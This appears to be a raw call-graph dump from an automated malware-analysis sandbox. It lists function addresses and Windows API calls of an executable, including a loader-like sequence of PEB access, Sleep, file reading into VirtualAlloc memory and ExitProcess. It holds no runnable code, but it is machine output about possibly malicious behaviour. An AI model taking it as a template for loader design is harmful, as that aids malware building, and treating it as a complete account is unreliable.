95301->95351 95304 85fbee GetCurrentProcess TerminateProcess 95304->95301 95305 85fc14 95306 811b90 48 API calls 95305->95306 95315 85fc3e 95305->95315 95309 85fc2d 95306->95309 95307 85fd65 95307->95308 95313 85fd7e FreeLibrary 95307->95313 95308->95265 95362 86040f 105 API calls _free 95309->95362 95310->95285 95310->95292 95310->95308 95310->95310 95348 8629e8 48 API calls ___crtGetEnvironmentStringsW 95310->95348 95349 85fda5 60 API calls 2 library calls 95310->95349 95312 811b90 48 API calls 95312->95315 95313->95308 95315->95307 95315->95312 95363 80dcae 50 API calls Mailbox 95315->95363 95365 86040f 105 API calls _free 95315->95365 95318 80bdfa 48 API calls 95317->95318 95319 860582 CharLowerBuffW 95318->95319 95366 841f11 95319->95366 95323 80d7f7 48 API calls 95324 8605bb 95323->95324 95373 8069e9 48 API calls ___crtGetEnvironmentStringsW 95324->95373 95326 8605d2 95328 80b18b 48 API calls 95326->95328 95327 86061a Mailbox 95327->95310 95329 8605de Mailbox 95328->95329 95329->95327 95374 85fda5 60 API calls 2 library calls 95329->95374 95331 85f725 95330->95331 95335 85f77a 95330->95335 95332 81f4ea 48 API calls 95331->95332 95333 85f747 95332->95333 95334 81f4ea 48 API calls 95333->95334 95333->95335 95334->95333 95336 860828 95335->95336 95337 860a53 Mailbox 95336->95337 95340 86084b _strcat _wcscpy __NMSG_WRITE 95336->95340 95337->95297 95338 80cf93 58 API calls 95338->95340 95339 80d286 48 API calls 95339->95340 95340->95337 95340->95338 95340->95339 95341 82395c 47 API calls __malloc_crt 95340->95341 95342 80936c 81 API calls 95340->95342 95377 848035 50 API calls __NMSG_WRITE 95340->95377 95341->95340 95342->95340 95345 81ed2d 95344->95345 95346 81edc5 VirtualProtect 95345->95346 95347 81ed93 95345->95347 95346->95347 95347->95300 95347->95301 95348->95310 95349->95310 95350->95304 95352 81c064 95351->95352 95354 81c069 Mailbox 95351->95354 95378 81c1af 48 API calls 95352->95378 95359 81c077 95354->95359 95379 81c15c 48 API calls 95354->95379 95356 81f4ea 48 API calls 95358 81c108 95356->95358 95357 81c152 95357->95305 95360 81f4ea 48 API calls 95358->95360 95359->95356 95359->95357 95361 81c113 95360->95361 95361->95305 95361->95361 95362->95315 95363->95315 95364->95289 95365->95315 95367 841f3b __NMSG_WRITE 95366->95367 95368 841f79 95367->95368 95370 841f6f 95367->95370 95371 841ffa 95367->95371 95368->95323 95368->95329 95370->95368 95375 81d37a 60 API calls 95370->95375 95371->95368 95376 81d37a 60 API calls 95371->95376 95373->95326 95374->95327 95375->95370 95376->95371 95377->95340 95378->95354 95379->95359 95380 11b2ed0 95394 11b0b20 95380->95394 95382 11b2f86 95397 11b2dc0 95382->95397 95384 11b2faf CreateFileW 95386 11b3003 95384->95386 95389 11b2ffe 95384->95389 95387 11b301a VirtualAlloc 95386->95387 95386->95389 95388 11b3038 ReadFile 95387->95388 95387->95389 95388->95389 95390 11b3053 95388->95390 95391 11b1dc0 13 API calls 95390->95391 95392 11b3086 95391->95392 95393 11b30a9 ExitProcess 95392->95393 95393->95389 95400 11b3fb0 GetPEB 95394->95400 95396 11b11ab 95396->95382 95398 11b2dc9 Sleep 95397->95398 95399 11b2dd7 95398->95399 95401 11b3fda 95400->95401 95401->95396 95402 8719cb 95407 802322 95402->95407 95404 8719d1 95440 820f0a 52 API calls __cinit 95404->95440 95406 8719db 95408 802344 95407->95408 95441 8026df 95408->95441 95413 80d7f7 48 API calls 95414 802384 95413->95414 95415 80d7f7 48 API calls 95414->95415 95416 80238e 95415->95416 95417 80d7f7 48 API calls 95416->95417 95418 802398 95417->95418 95419 80d7f7 48 API calls 95418->95419 95420 8023de 95419->95420 95421 80d7f7 48 API calls 95420->95421 95422 8024c1 95421->95422 95449 80263f 95422->95449 95426 8024f1 95427 80d7f7 48 API calls 95426->95427 95428 8024fb 95427->95428 95478 802745 95428->95478 95430 802546 95431 802556 GetStdHandle 95430->95431 95432 8025b1 95431->95432 95433 87501d 95431->95433 95434 8025b7 CoInitialize 95432->95434 95433->95432 95435 875026 95433->95435 95434->95404 95485 8492d4 53 API calls 95435->95485 95437 87502d 95486 8499f9 CreateThread 95437->95486 95439 875039 CloseHandle 95439->95434 95440->95406 95487 802854 95441->95487 95444 806a63 48 API calls 95445 80234a 95444->95445 95446 80272e 95445->95446 95501 8027ec 6 API calls 95446->95501 95448 80237a 95448->95413 95450 80d7f7 48 API calls 95449->95450 95451 80264f 95450->95451 95452 80d7f7 48 API calls 95451->95452 95453 802657 95452->95453 95502 8026a7 95453->95502 95456 8026a7 48 API calls 95457 802667 95456->95457 95458 80d7f7 48 API calls 95457->95458 95459 802672 95458->95459 95460 81f4ea 48 API calls 95459->95460 95461 8024cb 95460->95461 95462 8022a4 95461->95462 95463 8022b2 95462->95463 95464 80d7f7 48 API calls 95463->95464 95465 8022bd 95464->95465 95466 80d7f7 48 API calls 95465->95466 95467 8022c8 95466->95467 95468 80d7f7 48 API calls 95467->95468 95469 8022d3 95468->95469 95470 80d7f7 48 API calls 95469->95470 95471 8022de 95470->95471 95472 8026a7 48 API calls 95471->95472 95473 8022e9 95472->95473 95474 81f4ea 48 API calls 95473->95474 95475 8022f0 95474->95475 95476 871fe7 95475->95476 95477 8022f9 RegisterWindowMessageW 95475->95477 95477->95426 95479 802755 95478->95479 95480 875f4d 95478->95480 95481 81f4ea 48 API calls 95479->95481 95507 84c942 50 API calls 95480->95507 95484 80275d 95481->95484 95483 875f58 95484->95430 95485->95437 95486->95439 95508 8499df 54 API calls 95486->95508 95494 802870 95487->95494 95490 802870 48 API calls 95491 802864 95490->95491 95492 80d7f7 48 API calls 95491->95492 95493 802716 95492->95493 95493->95444 95495 80d7f7 48 API calls 95494->95495 95496 80287b 95495->95496 95497 80d7f7 48 API calls 95496->95497 95498 802883 95497->95498 95499 80d7f7 48 API calls 95498->95499 95500 80285c 95499->95500 95500->95490 95501->95448 95503 80d7f7 48 API calls 95502->95503 95504 8026b0 95503->95504 95505 80d7f7 48 API calls 95504->95505 95506 80265f 95505->95506 95506->95456 95507->95483 95509 87197b 95514 81dd94 95509->95514 95513 87198a 95515 81f4ea 48 API calls 95514->95515 95516 81dd9c 95515->95516 95517 81ddb0 95516->95517 95522 81df3d 95516->95522 95521 820f0a 52 API calls __cinit 95517->95521 95521->95513 95523 81df46 95522->95523 95524 81dda8 95522->95524 95554 820f0a 52 API calls __cinit 95523->95554 95526 81ddc0 95524->95526 95527 80d7f7 48 API calls 95526->95527 95528 81ddd7 GetVersionExW 95527->95528 95529 806a63 48 API calls 95528->95529 95530 81de1a 95529->95530 95555 81dfb4 95530->95555 95533 806571 48 API calls 95536 81de2e 95533->95536 95535 8724c8 95536->95535 95559 81df77 95536->95559 95538 81dea4 GetCurrentProcess 95568 81df5f LoadLibraryA GetProcAddress 95538->95568 95539 81debb 95540 81df31 GetSystemInfo 95539->95540 95541 81dee3 95539->95541 95543 81df0e 95540->95543 95562 81e00c 95541->95562 95546 81df21 95543->95546 95547 81df1c FreeLibrary 95543->95547 95546->95517 95547->95546 95548 81df29 GetSystemInfo 95550 81df03 95548->95550 95549 81def9 95565 81dff4 95549->95565 95550->95543 95553 81df09 FreeLibrary 95550->95553 95553->95543 95554->95524 95556 81dfbd 95555->95556 95557 80b18b 48 API calls 95556->95557 95558 81de22 95557->95558 95558->95533 95569 81df89 95559->95569 95573 81e01e 95562->95573 95566 81e00c 2 API calls 95565->95566 95567 81df01 GetNativeSystemInfo 95566->95567 95567->95550 95568->95539 95570 81dea0 95569->95570 95571 81df92 LoadLibraryA 95569->95571 95570->95538 95570->95539 95571->95570 95572 81dfa3 GetProcAddress 95571->95572 95572->95570 95574 81def1 95573->95574 95575 81e027 LoadLibraryA 95573->95575 95574->95548 95574->95549 95575->95574 95576 81e038 GetProcAddress 95575->95576 95576->95574 95577 8719ba 95582 81c75a 95577->95582 95581 8719c9 95583 80d7f7 48 API calls 95582->95583 95584 81c7c8 95583->95584 95591 81d26c 95584->95591 95586 87ccc3 95588 81c865 95588->95586 95589 81c881 95588->95589 95594 81d1fa 48 API calls ___crtGetEnvironmentStringsW 95588->95594 95590 820f0a 52 API calls __cinit 95589->95590 95590->95581 95595 81d298 95591->95595 95594->95588 95596 81d28b 95595->95596 95597 81d2a5 95595->95597 95596->95588 95597->95596 95598 81d2ac RegOpenKeyExW 95597->95598 95598->95596 95599 81d2c6 RegQueryValueExW 95598->95599 95600 81d2fc RegCloseKey 95599->95600 95601 81d2e7 95599->95601 95600->95596 95601->95600 95602 878eb8 95606 84a635 95602->95606 95604 878ec3 95605 84a635 84 API calls 95604->95605 95605->95604 95612 84a66f 95606->95612 95613 84a642 95606->95613 95607 84a671 95618 81ec4e 81 API calls 95607->95618 95609 84a676 95610 80936c 81 API calls 95609->95610 95611 84a67d 95610->95611 95614 80510d 48 API calls 95611->95614 95612->95604 95613->95607 95613->95609 95613->95612 95615 84a669 95613->95615 95614->95612 95617 814525 61 API calls ___crtGetEnvironmentStringsW 95615->95617 95617->95612 95618->95609 95619 825dfd 95620 825e09 __getstream 95619->95620 95656 827eeb GetStartupInfoW 95620->95656 95623 825e0e 95658 829ca7 GetProcessHeap 95623->95658 95624 825e66 95625 825e71 95624->95625 95743 825f4d 47 API calls 3 library calls 95624->95743 95659 827b47 95625->95659 95628 825e77 95629 825e82 __RTC_Initialize 95628->95629 95744 825f4d 47 API calls 3 library calls 95628->95744 95680 82acb3 95629->95680 95632 825e91 95633 825e9d GetCommandLineW 95632->95633 95745 825f4d 47 API calls 3 library calls 95632->95745 95699 832e7d GetEnvironmentStringsW 95633->95699 95636 825e9c 95636->95633 95640 825ec2 95712 832cb4 95640->95712 95643 825ec8 95644 825ed3 95643->95644 95747 82115b 47 API calls 3 library calls 95643->95747 95726 821195 95644->95726 95647 825edb 95648 825ee6 __wwincmdln 95647->95648 95748 82115b 47 API calls 3 library calls 95647->95748 95730 803a0f 95648->95730 95651 825efa 95652 825f09 95651->95652 95749 8213f1 47 API calls _doexit 95651->95749 95750 821186 47 API calls _doexit 95652->95750 95655 825f0e __getstream 95657 827f01 95656->95657 95657->95623 95658->95624 95751 82123a 30 API calls 2 library calls 95659->95751 95661 827b4c 95752 827e23 InitializeCriticalSectionAndSpinCount 95661->95752 95663 827b51 95664 827b55 95663->95664 95754 827e6d TlsAlloc 95663->95754 95753 827bbd 50 API calls 2 library calls 95664->95753 95667 827b5a 95667->95628 95668 827b67 95668->95664 95669 827b72 95668->95669 95755 826986 95669->95755 95672 827bb4 95763 827bbd 50 API calls 2 library calls 95672->95763 95675 827bb9 95675->95628 95676 827b93 95676->95672 95677 827b99 95676->95677 95762 827a94 47 API calls 4 library calls 95677->95762 95679 827ba1 GetCurrentThreadId 95679->95628 95681 82acbf __getstream 95680->95681 95682 827cf4 __lock 47 API calls 95681->95682 95683 82acc6 95682->95683 95684 826986 __calloc_crt 47 API calls 95683->95684 95686 82acd7 95684->95686 95685 82ad42 GetStartupInfoW 95694 82ae80 95685->95694 95695 82ad57 95685->95695 95686->95685 95687 82ace2 @_EH4_CallFilterFunc@8 __getstream 95686->95687 95687->95632 95688 82af44 95772 82af58 LeaveCriticalSection _doexit 95688->95772 95690 82aec9 GetStdHandle 95690->95694 95691 826986 __calloc_crt 47 API calls 95691->95695 95692 82aedb GetFileType 95692->95694 95693 82ada5 95693->95694 95697 82add7 GetFileType 95693->95697 95698 82ade5 InitializeCriticalSectionAndSpinCount 95693->95698 95694->95688 95694->95690 95694->95692 95696 82af08 InitializeCriticalSectionAndSpinCount 95694->95696 95695->95691 95695->95693 95695->95694 95696->95694 95697->95693 95697->95698 95698->95693 95700 825ead 95699->95700 95702 832e8e 95699->95702 95706 832a7b GetModuleFileNameW 95700->95706 95701 832ea9 95773 8269d0 47 API calls __malloc_crt 95701->95773 95702->95701 95702->95702 95704 832eb4 ___crtGetEnvironmentStringsW 95705 832eca FreeEnvironmentStringsW 95704->95705 95705->95700 95707 832aaf _wparse_cmdline 95706->95707 95708 825eb7 95707->95708 95709 832ae9 95707->95709 95708->95640 95746 82115b 47 API calls 3 library calls 95708->95746 95774 8269d0 47 API calls __malloc_crt 95709->95774 95711 832aef _wparse_cmdline 95711->95708 95713 832ccd __NMSG_WRITE 95712->95713 95717 832cc5 95712->95717 95714 826986 __calloc_crt 47 API calls 95713->95714 95715 832cf6 __NMSG_WRITE 95714->95715 95715->95717 95718 826986 __calloc_crt 47 API calls 95715->95718 95719 832d4d 95715->95719 95720 832d72 95715->95720 95723 832d89 95715->95723 95775 832567 47 API calls ___wstrgtold12_l 95715->95775 95716 821c9d _free 47 API calls 95716->95717 95717->95643 95718->95715 95719->95716 95721 821c9d _free 47 API calls 95720->95721 95721->95717 95776 826e20 IsProcessorFeaturePresent 95723->95776 95725 832d95 95725->95643 95727 8211a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95726->95727 95729 8211e0 __IsNonwritableInCurrentImage 95727->95729 95791 820f0a 52 API calls __cinit 95727->95791 95729->95647 95731 871ebf 95730->95731 95732 803a29 95730->95732 95733 803a63 IsThemeActive 95732->95733 95792 821405 95733->95792 95737 803a8f 95804 803adb SystemParametersInfoW SystemParametersInfoW 95737->95804 95739 803a9b 95805 803d19 95739->95805 95741 803aa3 SystemParametersInfoW 95742 803ac8 95741->95742 95742->95651 95743->95625 95744->95629 95745->95636 95749->95652 95750->95655 95751->95661 95752->95663 95753->95667 95754->95668 95757 82698d 95755->95757 95758 8269ca 95757->95758 95759 8269ab Sleep 95757->95759 95764 8330aa 95757->95764 95758->95672 95761 827ec9 TlsSetValue 95758->95761 95760 8269c2 95759->95760 95760->95757 95760->95758 95761->95676 95762->95679 95763->95675 95765 8330b5 95764->95765 95768 8330d0 __calloc_impl 95764->95768 95766 8330c1 95765->95766 95765->95768 95771 827c0e 47 API calls __getptd_noexit 95766->95771 95767 8330e0 RtlAllocateHeap 95767->95768 95770 8330c6 95767->95770 95768->95767 95768->95770 95770->95757 95771->95770 95772->95687 95773->95704 95774->95711 95775->95715 95777 826e2b 95776->95777 95782 826cb5 95777->95782 95781 826e46 95781->95725 95783 826ccf _memset __call_reportfault 95782->95783 95784 826cef IsDebuggerPresent 95783->95784 95790 8281ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95784->95790 95786 82a70c ___wstrgtold12_l 6 API calls 95787 826dd6 95786->95787 95789 828197 GetCurrentProcess TerminateProcess 95787->95789 95788 826db3 __call_reportfault 95788->95786 95789->95781 95790->95788 95791->95729 95793 827cf4 __lock 47 API calls 95792->95793 95794 821410 95793->95794 95857 827e58 LeaveCriticalSection 95794->95857 95796 803a88 95797 82146d 95796->95797 95798 821491 95797->95798 95799 821477 95797->95799 95798->95737 95799->95798 95858 827c0e 47 API calls __getptd_noexit 95799->95858 95801 821481 95859 826e10 8 API calls ___wstrgtold12_l 95801->95859 95803 82148c 95803->95737 95804->95739 95806 803d26 __ftell_nolock 95805->95806 95807 80d7f7 48 API calls 95806->95807 95808 803d31 GetCurrentDirectoryW 95807->95808 95860 8061ca 95808->95860 95810 803d57 IsDebuggerPresent 95811 803d65 95810->95811 95812 871cc1 MessageBoxA 95810->95812 95813 803e3a 95811->95813 95815 871cd9 95811->95815 95816 803d82 95811->95816 95812->95815 95814 803e41 SetCurrentDirectoryW 95813->95814 95817 803e4e Mailbox 95814->95817 95975 81c682 48 API calls 95815->95975 95934 8040e5 95816->95934 95817->95741 95820 871ce9 95825 871cff SetCurrentDirectoryW 95820->95825 95822 803da0 GetFullPathNameW 95823 806a63 48 API calls 95822->95823 95824 803ddb 95823->95824 95950 806430 95824->95950 95825->95817 95828 803df6 95829 803e00 95828->95829 95976 8471fa AllocateAndInitializeSid CheckTokenMembership FreeSid 95828->95976 95966 803e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 95829->95966 95832 871d1c 95832->95829 95835 871d2d 95832->95835 95837 805374 50 API calls 95835->95837 95836 803e0a 95838 803e1f 95836->95838 95840 804ffc 67 API calls 95836->95840 95839 871d35 95837->95839 95841 80e8d0 331 API calls 95838->95841 95842 80ce19 48 API calls 95839->95842 95840->95838 95843 803e2a 95841->95843 95844 871d42 95842->95844 95843->95813 95974 803847 Shell_NotifyIconW _memset 95843->95974 95845 871d6e 95844->95845 95846 871d49 95844->95846 95849 80518c 48 API calls 95845->95849 95848 80518c 48 API calls 95846->95848 95851 871d54 95848->95851 95850 871d6a GetForegroundWindow ShellExecuteW 95849->95850 95854 871d9e Mailbox 95850->95854 95853 80510d 48 API calls 95851->95853 95855 871d61 95853->95855 95854->95813 95856 80518c 48 API calls 95855->95856 95856->95850 95857->95796 95858->95801 95859->95803 95977 81e99b 95860->95977 95864 8061eb 95865 805374 50 API calls 95864->95865 95866 8061ff 95865->95866 95867 80ce19 48 API calls 95866->95867 95868 80620c 95867->95868 95994 8039db 95868->95994 95870 806216 Mailbox 95871 806eed 48 API calls 95870->95871 95872 80622b 95871->95872 96006 809048 95872->96006 95875 80ce19 48 API calls 95876 806244 95875->95876 95877 80d6e9 55 API calls 95876->95877 95878 806254 Mailbox 95877->95878 95879 80ce19 48 API calls 95878->95879 95880 80627c 95879->95880 95881 80d6e9 55 API calls 95880->95881 95882 80628f Mailbox 95881->95882 95883 80ce19 48 API calls 95882->95883 95884 8062a0 95883->95884 95885 80d645 53 API calls 95884->95885 95886 8062b2 Mailbox 95885->95886 95887 80d7f7 48 API calls 95886->95887 95888 8062c5 95887->95888 96009 8063fc 95888->96009 95892 8062df 95893 8062e9 95892->95893 95894 871c08 95892->95894 95895 820fa7 _W_store_winword 59 API calls 95893->95895 95896 8063fc 48 API calls 95894->95896 95897 8062f4 95895->95897 95898 871c1c 95896->95898 95897->95898 95899 8062fe 95897->95899 95901 8063fc 48 API calls 95898->95901 95900 820fa7 _W_store_winword 59 API calls 95899->95900 95902 806309 95900->95902 95903 871c38 95901->95903 95902->95903 95904 806313 95902->95904 95905 805374 50 API calls 95903->95905 95906 820fa7 _W_store_winword 59 API calls 95904->95906 95907 871c5d 95905->95907 95908 80631e 95906->95908 95909 8063fc 48 API calls 95907->95909 95910 80635f 95908->95910 95912 871c86 95908->95912 95915 8063fc 48 API calls 95908->95915 95913 871c69 95909->95913 95911 80636c 95910->95911 95910->95912 95917 81c050 48 API calls 95911->95917 95916 806eed 48 API calls 95912->95916 95914 806eed 48 API calls 95913->95914 95918 871c77 95914->95918 95919 806342 95915->95919 95920 871ca8 95916->95920 95921 806384 95917->95921 95922 8063fc 48 API calls 95918->95922 95923 806eed 48 API calls 95919->95923 95924 8063fc 48 API calls 95920->95924 95926 811b90 48 API calls 95921->95926 95922->95912 95927 806350 95923->95927 95925 871cb5 95924->95925 95925->95925 95931 806394 95926->95931 95928 8063fc 48 API calls 95927->95928 95928->95910 95929 811b90 48 API calls 95929->95931 95931->95929 95932 8063fc 48 API calls 95931->95932 95933 8063d6 Mailbox 95931->95933 96025 806b68 48 API calls 95931->96025 95932->95931 95933->95810 95935 8040f2 __ftell_nolock 95934->95935 95936 87370e _memset 95935->95936 95937 80410b 95935->95937 95939 87372a GetOpenFileNameW 95936->95939 95938 80660f 49 API calls 95937->95938 95940 804114 95938->95940 95941 873779 95939->95941 96068 8040a7 95940->96068 95944 806a63 48 API calls 95941->95944 95946 87378e 95944->95946 95946->95946 95947 804129 96086 804139 95947->96086 95951 80643d __ftell_nolock 95950->95951 96257 804c75 95951->96257 95953 806442 95964 803dee 95953->95964 96268 805928 86 API calls 95953->96268 95955 80644f 95955->95964 96269 805798 88 API calls Mailbox 95955->96269 95957 806458 95958 80645c GetFullPathNameW 95957->95958 95957->95964 95959 806a63 48 API calls 95958->95959 95960 806488 95959->95960 95961 806a63 48 API calls 95960->95961 95962 806495 95961->95962 95963 806a63 48 API calls 95962->95963 95965 875dcf _wcscat 95962->95965 95963->95964 95964->95820 95964->95828 95967 803ed8 95966->95967 95968 871cba 95966->95968 96273 804024 95967->96273 95972 803e05 95973 8036b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95972->95973 95973->95836 95974->95813 95975->95820 95976->95832 95978 80d7f7 48 API calls 95977->95978 95979 8061db 95978->95979 95980 806009 95979->95980 95981 806016 __ftell_nolock 95980->95981 95982 806a63 48 API calls 95981->95982 95987 80617c Mailbox 95981->95987 95984 806048 95982->95984 95991 80607e Mailbox 95984->95991 96026 8061a6 95984->96026 95985 8061a6 48 API calls 95985->95991 95986 80614f 95986->95987 95988 80ce19 48 API calls 95986->95988 95987->95864 95990 806170 95988->95990 95989 80ce19 48 API calls 95989->95991 95992 8064cf 48 API calls 95990->95992 95991->95985 95991->95986 95991->95987 95991->95989 95993 8064cf 48 API calls 95991->95993 95992->95987 95993->95991 95995 8041a9 136 API calls 95994->95995 95996 8039fe 95995->95996 95997 803a06 95996->95997 96029 84c396 95996->96029 95997->95870 96000 821c9d _free 47 API calls 96003 872ffd 96000->96003 96001 804252 84 API calls 96002 872ff0 96001->96002 96002->96000 96004 804252 84 API calls 96003->96004 96005 873006 96004->96005 96005->96005 96007 81f4ea 48 API calls 96006->96007 96008 806237 96007->96008 96008->95875 96010 806406 96009->96010 96011 80641f 96009->96011 96012 806eed 48 API calls 96010->96012 96013 806a63 48 API calls 96011->96013 96014 8062d1 96012->96014 96013->96014 96015 820fa7 96014->96015 96016 820fb3 96015->96016 96017 821028 96015->96017 96024 820fd8 96016->96024 96065 827c0e 47 API calls __getptd_noexit 96016->96065 96067 82103a 59 API calls 3 library calls 96017->96067 96020 821035 96020->95892 96021 820fbf 96066 826e10 8 API calls ___wstrgtold12_l 96021->96066 96023 820fca 96023->95892 96024->95892 96025->95931 96027 80bdfa 48 API calls 96026->96027 96028 8061b1 96027->96028 96028->95984 96030 804517 83 API calls 96029->96030 96031 84c405 96030->96031 96032 84c56d 94 API calls 96031->96032 96033 84c417 96032->96033 96034 8044ed 64 API calls 96033->96034 96060 84c41b 96033->96060 96035 84c432 96034->96035 96036 8044ed 64 API calls 96035->96036 96037 84c442 96036->96037 96038 8044ed 64 API calls 96037->96038 96039 84c45d 96038->96039 96040 8044ed 64 API calls 96039->96040 96041 84c478 96040->96041 96042 804517 83 API calls 96041->96042 96043 84c48f 96042->96043 96044 82395c __malloc_crt 47 API calls 96043->96044 96045 84c496 96044->96045 96046 82395c __malloc_crt 47 API calls 96045->96046 96047 84c4a0 96046->96047 96048 8044ed 64 API calls 96047->96048 96049 84c4b4 96048->96049 96050 84bf5a GetSystemTimeAsFileTime 96049->96050 96051 84c4c7 96050->96051 96052 84c4f1 96051->96052 96053 84c4dc 96051->96053 96055 84c556 96052->96055 96056 84c4f7 96052->96056 96054 821c9d _free 47 API calls 96053->96054 96058 84c4e2 96054->96058 96057 821c9d _free 47 API calls 96055->96057 96064 84b965 118 API calls __fcloseall 96056->96064 96057->96060 96061 821c9d _free 47 API calls 96058->96061 96060->96001 96060->96002 96061->96060 96062 84c54e 96063 821c9d _free 47 API calls 96062->96063 96063->96060 96064->96062 96065->96021 96066->96023 96067->96020 96069 82f8a0 __ftell_nolock 96068->96069 96070 8040b4 GetLongPathNameW 96069->96070 96071 806a63 48 API calls 96070->96071 96072 8040dc 96071->96072 96073 8049a0 96072->96073 96074 80d7f7 48 API calls 96073->96074 96075 8049b2 96074->96075 96076 80660f 49 API calls 96075->96076 96077 8049bd 96076->96077 96078 8049c8 96077->96078 96082 872e35 96077->96082 96079 8064cf 48 API calls 96078->96079 96081 8049d4 96079->96081 96120 8028a6 96081->96120 96084 872e4f 96082->96084 96126 81d35e 60 API calls 96082->96126 96085 8049e7 Mailbox 96085->95947 96087 8041a9 136 API calls 96086->96087 96088 80415e 96087->96088 96089 873489 96088->96089 96091 8041a9 136 API calls 96088->96091 96090 84c396 122 API calls 96089->96090 96093 87349e 96090->96093 96092 804172 96091->96092 96092->96089 96094 80417a 96092->96094 96095 8734a2 96093->96095 96096 8734bf 96093->96096 96097 804186 96094->96097 96098 8734aa 96094->96098 96099 804252 84 API calls 96095->96099 96100 81f4ea 48 API calls 96096->96100 96127 80c833 96097->96127 96215 846b49 87 API calls _wprintf 96098->96215 96099->96098 96109 873504 Mailbox 96100->96109 96104 8734b8 96104->96096 96105 8736b4 96106 821c9d _free 47 API calls 96105->96106 96107 8736bc 96106->96107 96108 804252 84 API calls 96107->96108 96111 8736c5 96108->96111 96109->96105 96109->96111 96117 80ce19 48 API calls 96109->96117 96216 842551 48 API calls ___crtGetEnvironmentStringsW 96109->96216 96217 842472 60 API calls 2 library calls 96109->96217 96218 849c12 48 API calls 96109->96218 96219 80ba85 48 API calls ___crtGetEnvironmentStringsW 96109->96219 96220 804dd9 48 API calls 96109->96220 96114 821c9d _free 47 API calls 96111->96114 96115 804252 84 API calls 96111->96115 96221 8425b5 86 API calls 4 library calls 96111->96221 96114->96111 96115->96111 96117->96109 96121 8028b8 96120->96121 96125 8028d7 ___crtGetEnvironmentStringsW 96120->96125 96123 81f4ea 48 API calls 96121->96123 96122 81f4ea 48 API calls 96124 8028ee 96122->96124 96123->96125 96124->96085 96125->96122 96126->96082 96128 80c843 __ftell_nolock 96127->96128 96129 80c860 96128->96129 96130 873095 96128->96130 96227 8048ba 49 API calls 96129->96227 96243 8425b5 86 API calls 4 library calls 96130->96243 96133 80c882 96228 804550 56 API calls 96133->96228 96134 8730a8 96244 8425b5 86 API calls 4 library calls 96134->96244 96136 80c897 96136->96134 96138 80c89f 96136->96138 96140 80d7f7 48 API calls 96138->96140 96139 8730c4 96142 80c90c 96139->96142 96141 80c8ab 96140->96141 96229 81e968 49 API calls __ftell_nolock 96141->96229 96144 8730d7 96142->96144 96145 80c91a 96142->96145 96148 804907 CloseHandle 96144->96148 96147 821dfc __wsplitpath 47 API calls 96145->96147 96146 80c8b7 96149 80d7f7 48 API calls 96146->96149 96156 80c943 _wcscat _wcscpy 96147->96156 96150 8730e3 96148->96150 96151 80c8c3 96149->96151 96152 8041a9 136 API calls 96150->96152 96153 80660f 49 API calls 96151->96153 96154 87310d 96152->96154 96155 80c8d1 96153->96155 96157 873136 96154->96157 96162 84c396 122 API calls 96154->96162 96230 81eb66 SetFilePointerEx ReadFile 96155->96230 96161 80c96d SetCurrentDirectoryW 96156->96161 96245 8425b5 86 API calls 4 library calls 96157->96245 96159 80c8fd 96231 8046ce SetFilePointerEx SetFilePointerEx 96159->96231 96165 81f4ea 48 API calls 96161->96165 96166 873129 96162->96166 96164 87314d 96174 80cad1 Mailbox 96164->96174 96167 80c988 96165->96167 96168 873152 96166->96168 96169 873131 96166->96169 96171 8047b7 48 API calls 96167->96171 96170 804252 84 API calls 96168->96170 96172 804252 84 API calls 96169->96172 96173 873157 96170->96173 96187 80c993 Mailbox __NMSG_WRITE 96171->96187 96172->96157 96175 81f4ea 48 API calls 96173->96175 96222 8048dd 96174->96222 96182 873194 96175->96182 96176 80ca9d 96239 804907 96176->96239 96180 803d98 96180->95813 96180->95822 96181 80caa9 SetCurrentDirectoryW 96181->96174 96246 80ba85 48 API calls ___crtGetEnvironmentStringsW 96182->96246 96186 8733ce 96252 849b72 48 API calls 96186->96252 96187->96176 96195 87345f 96187->96195 96198 80ce19 48 API calls 96187->96198 96201 873467 96187->96201 96232 80b337 56 API calls _wcscpy 96187->96232 96233 81c258 GetStringTypeW 96187->96233 96234 80cb93 59 API calls __wcsnicmp 96187->96234 96235 80cb5a GetStringTypeW __NMSG_WRITE 96187->96235 96236 8216d0 GetStringTypeW wcstoxq 96187->96236 96237 80cc24 162 API calls 3 library calls 96187->96237 96238 81c682 48 API calls 96187->96238 96191 873480 96191->96176 96192 8733f0 96253 8629e8 48 API calls ___crtGetEnvironmentStringsW 96192->96253 96194 8733fd 96196 821c9d _free 47 API calls 96194->96196 96255 84240b 48 API calls 3 library calls 96195->96255 96196->96174 96198->96187 96256 8425b5 86 API calls 4 library calls 96201->96256 96206 80ce19 48 API calls 96211 8731dd Mailbox 96206->96211 96209 873420 96254 8425b5 86 API calls 4 library calls 96209->96254 96211->96186 96211->96206 96211->96209 96247 842551 48 API calls ___crtGetEnvironmentStringsW 96211->96247 96248 842472 60 API calls 2 library calls 96211->96248 96249 849c12 48 API calls 96211->96249 96250 80ba85 48 API calls ___crtGetEnvironmentStringsW 96211->96250 96251 81c682 48 API calls 96211->96251 96212 873439 96213 821c9d _free 47 API calls 96212->96213 96214 87344c 96213->96214 96214->96174 96215->96104 96216->96109 96217->96109 96218->96109 96219->96109 96220->96109 96221->96111 96223 804907 CloseHandle 96222->96223 96224 8048e5 Mailbox 96223->96224 96225 804907 CloseHandle 96224->96225 96226 8048fc 96225->96226 96226->96180 96227->96133 96228->96136 96229->96146 96230->96159 96231->96142 96232->96187 96233->96187 96234->96187 96235->96187 96236->96187 96237->96187 96238->96187 96240 804920 96239->96240 96241 804911 96239->96241 96240->96241 96242 804925 CloseHandle 96240->96242 96241->96181 96242->96241 96243->96134 96244->96139 96245->96164 96246->96211 96247->96211 96248->96211 96249->96211 96250->96211 96251->96211 96252->96192 96253->96194 96254->96212 96255->96201 96256->96191 96258 804d94 96257->96258 96259 804c8b 96257->96259 96258->95953 96259->96258 96260 81f4ea 48 API calls 96259->96260 96261 804cb2 96260->96261 96262 81f4ea 48 API calls 96261->96262 96267 804d22 96262->96267 96263 80b470 91 API calls 96263->96267 96267->96258 96267->96263 96270 804dd9 48 API calls 96267->96270 96271 849af1 48 API calls 96267->96271 96272 80ba85 48 API calls ___crtGetEnvironmentStringsW 96267->96272 96268->95955 96269->95957 96270->96267 96271->96267 96272->96267 96274 87418d EnumResourceNamesW 96273->96274 96275 80403c LoadImageW 96273->96275 96276 803ee1 RegisterClassExW 96274->96276 96275->96276 96277 803f53 7 API calls 96276->96277 96277->95972

                                            Executed Functions

